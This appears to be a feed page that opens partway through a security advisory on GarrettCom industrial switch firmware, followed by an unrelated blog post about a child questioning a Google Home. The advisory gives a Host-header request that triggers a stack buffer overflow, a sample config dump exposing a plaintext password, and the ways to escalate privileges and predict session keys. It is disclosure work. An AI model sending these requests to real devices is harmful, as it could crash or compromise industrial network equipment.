User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.28 Safari/537.36
Accept: */*
Referer: https://192.168.0.2/gc/flash.php
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8


HTTP/1.0 200 OK
Server: GoAhead-Webs
Content-Type: text/html

<?xml version='1.0' encoding='UTF-8'?><data val="users"><changed val="yes" />
<helpfile val="user_accounts.html" />
<user uid="operator" access="Operator" />
<user uid="manager" access="Manager" />
<user uid="gibson" access="Manager" />
</data>

GarrettCom-02 - Secrets Accessible to All Users

Severity: High

Unprivileged but authenticated users ("operator" level access) can view the plaintext passwords of all users configured on the system, allowing them to escalate privileges to "manager" level. While the default "show config" masks the passwords, executing "show config saved" includes the plaintext passwords. The value of the "secrets" setting does not affect this.

6K>show config group=user saved
...
#User Management#
user
add user=gibson level=2 pass=god
Exit
...

GarrettCom-03 - Stack Based Buffer Overflow in HTTP Server

Severity: High

When rendering the /gc/flash.php page, the server performs URI encoding of the Host header into a fixed-length buffer on the stack. This encoding appears unbounded and can lead to memory corruption, possibly including remote code execution. Sending garbage data appears to hang the webserver thread after it responds to the present request. Requests with Host headers longer than 220 characters trigger the observed behavior.

GET /gc/flash.php HTTP/1.1
Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.28 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

GarrettCom-04 - SSL Keys Shared Across Devices

Severity: Moderate

The SSL certificate on all devices running firmware version 4.6.0 is the same. This issue was previously reported and an advisory released by ICS-CERT. While GarrettCom reported the issue was fixed in 4.5.6, the web server certificate remains static in 4.6.0:

openssl s_client -connect 192.168.0.5:443 -showcerts
CONNECTED(00000003)
depth=0 C = US, ST = California, L = Fremont, O = Belden, OU = Technical Support, CN = 192.168.1.2, emailAddress = gcisupport@belden.com
verify error:num=18:self signed certificate
verify return:1
depth=0 C = US, ST = California, L = Fremont, O = Belden, OU = Technical Support, CN = 192.168.1.2, emailAddress = gcisupport@belden.com
verify return:1
---
Certificate chain
0 s:/C=US/ST=California/L=Fremont/O=Belden/OU=Technical Support/CN=192.168.1.2/emailAddress=gcisupport@belden.com
i:/C=US/ST=California/L=Fremont/O=Belden/OU=Technical Support/CN=192.168.1.2/emailAddress=gcisupport@belden.com
-----BEGIN CERTIFICATE-----
MIIEtTCCA52gAwIBAgIBADANBgkqhkiG9w0BAQUFADCBnTELMAkGA1UEBhMCVVMx
EzARBgNVBAgTCkNhbGlmb3JuaWExEDAOBgNVBAcTB0ZyZW1vbnQxDzANBgNVBAoT
BkJlbGRlbjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxFDASBgNVBAMTCzE5
Mi4xNjguMS4yMSQwIgYJKoZIhvcNAQkBFhVnY2lzdXBwb3J0QGJlbGRlbi5jb20w
HhcNMTUxMDI3MTEyNzQ2WhcNMjUxMDI0MTEyNzQ2WjCBnTELMAkGA1UEBhMCVVMx
EzARBgNVBAgTCkNhbGlmb3JuaWExEDAOBgNVBAcTB0ZyZW1vbnQxDzANBgNVBAoT
BkJlbGRlbjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxFDASBgNVBAMTCzE5
Mi4xNjguMS4yMSQwIgYJKoZIhvcNAQkBFhVnY2lzdXBwb3J0QGJlbGRlbi5jb20w
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDFlt+j4OvpcgfdrFGnBxti
ds6r9sNEcR9JdAFbOmwybQkdqIw9Z9+teU/rixPocEE4gL8beNuw/D3lDc4RJ63m
1zuQ1riFOkTsz7koKQNWTh3CkIBE7843p5I/GVvhfR7xNCCmCWPdq+6/b3nhott5
oBeMLOjIWnjFgyVMsWR22JOYv+euWwr4oqZDLfBHjfipnu36J1E2kHLG3TL9uwyN
DUxtrIbvfi5tOxi8tx1bxZFQU1jxoQa725gO+1TOYzfSoY1a7/M0rMhJM1wFXak6
jbDbJLSv2TXMWrSJlGFUbCcKv3kE22zLcU/wx1Xl4a4NNvFW7Sf5OG2B+bFLr4fD
AgMBAAGjgf0wgfowHQYDVR0OBBYEFLtGmDWgd773vSkKikDFSz8VOZ7DMIHKBgNV
HSMEgcIwgb+AFLtGmDWgd773vSkKikDFSz8VOZ7DoYGjpIGgMIGdMQswCQYDVQQG
EwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEQMA4GA1UEBxMHRnJlbW9udDEPMA0G
A1UEChMGQmVsZGVuMRowGAYDVQQLExFUZWNobmljYWwgU3VwcG9ydDEUMBIGA1UE
AxMLMTkyLjE2OC4xLjIxJDAiBgkqhkiG9w0BCQEWFWdjaXN1cHBvcnRAYmVsZGVu
LmNvbYIBADAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4IBAQBAiuv06CMD
ij+9bEZAfmHftptG4UqsNgYIFZ1sN7HC6RBR9xy45fWVcQN3l3KiyddLsftbZSOa
CRPpzqgpF58hGwAa7+yQPOjOWf+uLc9Oyex6P9ewAo6c5iiYI865FSQ+QCY4xbD1
Uk/WFV2LKOzxkXPRcVB4KR81g8tSZF3E8llybhEngg7cvN3uHpO5a5U085xuBbcF
To9PSbGKyJ7UGESBTD6KxLWAxoD6VGRV2CAZa/F9RTbdG1ZbTUMvoEDmYqv7Pjv/
ApZzztLJlCyhVM4N/jh/Q/g1VaQWuzPpza6utjN5soUxeZYJB6KwzGUiLnyTNBJz
L4JtsUO8AcWb
-----END CERTIFICATE-----

Note that Belden Garrettcom has addressed this issue by reinforcing that users of the switches should install their own SSL certificates if they do not want to use the default certificate and key.

GarrettCom-05 - Weak SSL Ciphers Enabled

Severity: Moderate

Many of the SSL cipher suites offered by the switch are outdated or rely on insecure ciphers or hashes. Additionally, no key exchanges with perfect forward secrecy are offered, rendering all previous communications possibly compromised, given the issue reported above. Particularly of note is the use of 56-bit DES, RC4, and MD5-based MACs.

ssl3: AES256-SHA
ssl3: CAMELLIA256-SHA
ssl3: DES-CBC3-SHA
ssl3: AES128-SHA
ssl3: SEED-SHA
ssl3: CAMELLIA128-SHA
ssl3: RC4-SHA
ssl3: RC4-MD5
ssl3: DES-CBC-SHA
tls1: AES256-SHA
tls1: CAMELLIA256-SHA
tls1: DES-CBC3-SHA
tls1: AES128-SHA
tls1: SEED-SHA
tls1: CAMELLIA128-SHA
tls1: RC4-SHA
tls1: RC4-MD5
tls1: DES-CBC-SHA
tls1_1: AES256-SHA
tls1_1: CAMELLIA256-SHA
tls1_1: DES-CBC3-SHA
tls1_1: AES128-SHA
tls1_1: SEED-SHA
tls1_1: CAMELLIA128-SHA
tls1_1: RC4-SHA
tls1_1: RC4-MD5
tls1_1: DES-CBC-SHA
tls1_2: AES256-GCM-SHA384
tls1_2: AES256-SHA256
tls1_2: AES256-SHA
tls1_2: CAMELLIA256-SHA
tls1_2: DES-CBC3-SHA
tls1_2: AES128-GCM-SHA256
tls1_2: AES128-SHA256
tls1_2: AES128-SHA
tls1_2: SEED-SHA
tls1_2: CAMELLIA128-SHA
tls1_2: RC4-SHA
tls1_2: RC4-MD5
tls1_2: DES-CBC-SHA

GarrettCom-06 - Weak HTTP session key generation

Severity: Moderate

The HTTP session key generation is predictable due to the lack of randomness in the generation process. The key is generated by hashing the previous hash result with the current time unit, with a precision of around 50 units per second. The previous hash is replaced with a fixed salt for the first key generation.

The vulnerability allows an attacker to predict the first key generated by the switch if they have some knowledge of when the key was generated. Alternatively, it also enables privilege escalation attacks that predict all future keys by observing two consecutive key generations at lower privileges.

Timeline

Discovery

These issues were discovered by Andrew Griffiths, David Tomaschik, and Xiaoran Wang of the Google Security Assessments Team.

19 May 2017 7:00am GMT

Jono Bacon: Google Home: An Insight Into a 4-Year-Old’s Mind

Recently I got a Google Home (thanks to Google for the kind gift). Last week I recorded a quick video of me interrogating it:

Well, tonight I nipped upstairs quickly to grab something, and as I came back downstairs I heard Jack, our vivacious 4-year-old, asking it questions, seemingly not expecting daddy to be listening.

This is when I discovered the wild curiosity in a 4-year-old's mind. It included such size and weight questions as…

OK Google, how big is the biggest teddy bear?

…and…

OK Google, how much does my foot weigh?

…to curiosities about physics…

OK Google, can chickens fly faster than space rockets?

…to queries about his family…

OK Google, is daddy a mommy?

…and while asking this question he interrupted Google's denial of an answer with…

OK Google, has daddy eaten a giant football?

Jack then switched gears a little bit, out of likely frustration that Google seemed to "not have an answer for that yet" to all of his questions, and figured the more confusing the question, the more likely that talking thing in the kitchen would work:

OK Google, does a guitar make a hggghghghgghgghggghghg sound?

Google was predictably stumped with the answer. So, in classic Jack fashion, the retort was:

OK Google, banana peel.

While this may seem random, it isn't:

I would love to see the world through his eyes, it must be glorious.

The post Google Home: An Insight Into a 4-Year-Old's Mind appeared first on Jono Bacon.

19 May 2017 3:27am GMT